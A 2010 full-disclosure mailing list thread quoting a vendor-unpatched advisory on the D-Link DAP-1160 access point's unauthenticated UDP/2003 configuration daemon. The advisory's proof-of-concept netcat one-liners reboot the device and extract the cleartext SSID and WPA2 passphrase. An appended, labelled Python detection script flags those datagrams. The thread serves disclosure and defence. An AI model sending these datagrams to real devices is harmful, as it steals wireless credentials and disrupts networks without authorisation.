Date: Mon, 28 Jun 2010 17:28:33 +0200
From: Cristofaro Mune <pulsoid@...silence.org>
To: Gary Baribault <gary@...ibault.net>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

As the D-Link DAP-1160 is an Access Point and not a router, it does not have a specific WAN interface.
Nonetheless, the UDP 2003 port is open and reachable from all the available interfaces on this device.

Best Regards,

Cristofaro Mune

Gary Baribault wrote:
> Is that UDP 2003 open on the WAN interface as well?
>
> Gary Baribault
>
> On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
> > Security Advisory
> >
> > IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
> >
> > Advisory Information
> > --------------------
> > Published: 2010-06-28
> > Updated: 2010-06-28
> >
> > Manufacturer: D-Link
> > Model: DAP-1160
> > Firmware version: 1.20b06, 1.30b10, 1.31b01
> >
> > Vulnerability Details
> > ---------------------
> > Public References: Not Assigned
> >
> > Platform:
> > Successfully tested on D-Link DAP-1160 loaded with firmware versions: v120b06, v130b10, v131b01.
> > Other models and/or firmware versions may also be affected.
> > Note: Only firmware version major numbers are displayed on the administration web interface: 1.20, 1.30, 1.31
> >
> > Background Information:
> > D-Link DAP-1160 is a wireless access point that allows wireless clients connectivity to wired networks.
> > 802.11b and 802.11g protocols are supported. WEP, WPA and WPA2 are supported.
> >
> > Summary:
> > Unauthenticated access and modification of several device parameters, including Wi-Fi SSID, keys and passphrases, is possible.
> > Unauthenticated remote reboot of the device can also be performed.
> >
> > Details:
> > DCCD is a UDP daemon that listens on port UDP 2003 of the device, which is likely used for easy device configuration via the DCC (D-Link Click 'n Connect) protocol.
> > By sending properly formatted UDP datagrams to the dccd daemon it is possible to perform security-relevant operations without any previous authentication.
> > It is possible to remotely retrieve sensitive wireless configuration parameters, such as Wi-Fi SSID, encryption types, keys and passphrases, along with other additional information.
> > It is also possible to remotely modify such parameters and configure the device without any knowledge of the web administration password.
> > Remote reboot is another operation that an attacker may perform in an unauthenticated way, possibly triggering a Denial-of-Service condition.
> >
> > POC:
> > - Remote reboot
> > python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003
> >
> > - Retrieving Wi-Fi SSID
> > python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003
> > cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the received datagram)
> >
> > - Retrieving WPA2 PSK
> > python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003
> > cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram)
> >
> > Impacts:
> > Remote extraction of sensitive information
> > Modification of existing device configuration
> > Possible Denial-of-Service
> >
> > Solutions & Workaround:
> > Not available
> >
> > Additional Information
> > ----------------------
> > Timeline (dd/mm/yy):
> > 17/02/2010: Vulnerability discovered
> > 17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website
> > 18/02/2010: Point of contact requested to customer service
> > ----------- No response -----------
> > 26/05/2010: Partial disclosure at CONFidence 2010
> > 28/06/2010: This advisory
> >
> > Additional information available at http://www.icysilence.org
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
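Since the advisory lists no fix and the reply above confirms udp/2003 is reachable on every interface, the practical defender options are to limit who can reach that port and to notice when someone talks to it. The following is an added detection example for this thread, not code from the advisory author or from D-Link. It classifies captured UDP datagrams using only what the advisory's PoC shows: a one-byte opcode (0x03 for a parameter query, 0x05 for reboot), seven zero bytes, and the tag bytes 0x21 0x27 (SSID), 0x23 0x27 (unnamed in the advisory) and 0x24 0x27 (WPA2 PSK). The opcode and tag names, the record tuple shape and the sample addresses are assumptions made for the example; the byte values and the port come from the advisory.

```python
"""Detection helper for the unauthenticated dccd (UDP/2003) requests described in
IS-2010-004. Added example; not the advisory author's or D-Link's code.
Datagram layout is taken only from the advisory's PoC: opcode byte, seven zero
bytes, then the parameter tags requested. Opcode/tag names are assumptions."""
from typing import Optional

DCCD_PORT = 2003  # port the advisory reports dccd listening on (all interfaces)

OPCODES = {0x03: "query", 0x05: "reboot"}  # names assumed; byte values from the PoC

TAGS = {  # tag byte pairs from the PoC; names as the advisory describes them
    b"\x21\x27": "wifi-ssid",
    b"\x23\x27": "wpa-parameter (tag unnamed in the advisory)",
    b"\x24\x27": "wpa2-psk",
}


def classify_dccd_request(payload: bytes) -> Optional[dict]:
    """Return what an inbound dccd datagram asks for, or None if it does not
    match the request shape in the advisory (opcode byte + seven zero bytes)."""
    if len(payload) < 8 or payload[0] not in OPCODES or payload[1:8] != bytes(7):
        return None
    body = payload[8:]
    # The encoding after the two tag bytes is not fully described in the
    # advisory, so match the tag pairs anywhere in the body instead of parsing
    # a structure the page does not document.
    requested = [name for tag, name in TAGS.items() if tag in body]
    return {"opcode": OPCODES[payload[0]], "requested": requested}


def severity(hit: dict) -> str:
    """Map a classified request to the impact class the advisory lists."""
    if hit["opcode"] == "reboot":
        return "denial-of-service"
    if any(name.startswith("wpa") for name in hit["requested"]):
        return "credential-disclosure"
    return "information-disclosure"


def scan_udp_records(records) -> list:
    """records: iterable of (src_ip, dst_port, payload) tuples, e.g. extracted
    from a packet capture. Returns one alert string per matching datagram."""
    alerts = []
    for src_ip, dst_port, payload in records:
        if dst_port != DCCD_PORT:
            continue
        hit = classify_dccd_request(payload)
        if hit is None:
            continue
        what = ", ".join(hit["requested"]) or "no parameters"
        alerts.append(f"{src_ip} -> udp/{DCCD_PORT} dccd {hit['opcode']} "
                      f"({what}) [{severity(hit)}]")
    return alerts


# Constructed sample records (addresses are documentation-range placeholders).
# The first three reproduce the advisory's PoC datagrams as `python -c 'print ...'`
# would emit them, i.e. including the trailing newline that print appends.
SAMPLE_RECORDS = [
    ("192.0.2.10", 2003, b"\x05" + b"\x00" * 7 + b"\n"),
    ("192.0.2.10", 2003, b"\x03" + b"\x00" * 7 + b"\x21\x27\x00\n"),
    ("192.0.2.11", 2003, b"\x03" + b"\x00" * 7 + b"\x23\x27\x00\x00\x24\x27\x00\n"),
    ("192.0.2.12", 2003, b"hello"),               # wrong shape: not flagged
    ("192.0.2.13", 53, b"\x05" + b"\x00" * 7),    # wrong port: not flagged
]

if __name__ == "__main__":
    for line in scan_udp_records(SAMPLE_RECORDS):
        print(line)
```

Run over a real capture, `scan_udp_records` would be fed tuples pulled from the UDP layer of each packet; any hit from an address that is not the management host is worth an alert, because the advisory states the daemon performs these operations with no authentication at all. Pairing the detection with an upstream firewall rule that drops udp/2003 from untrusted segments is the only mitigation the advisory's facts support, since it reports no vendor fix or workaround.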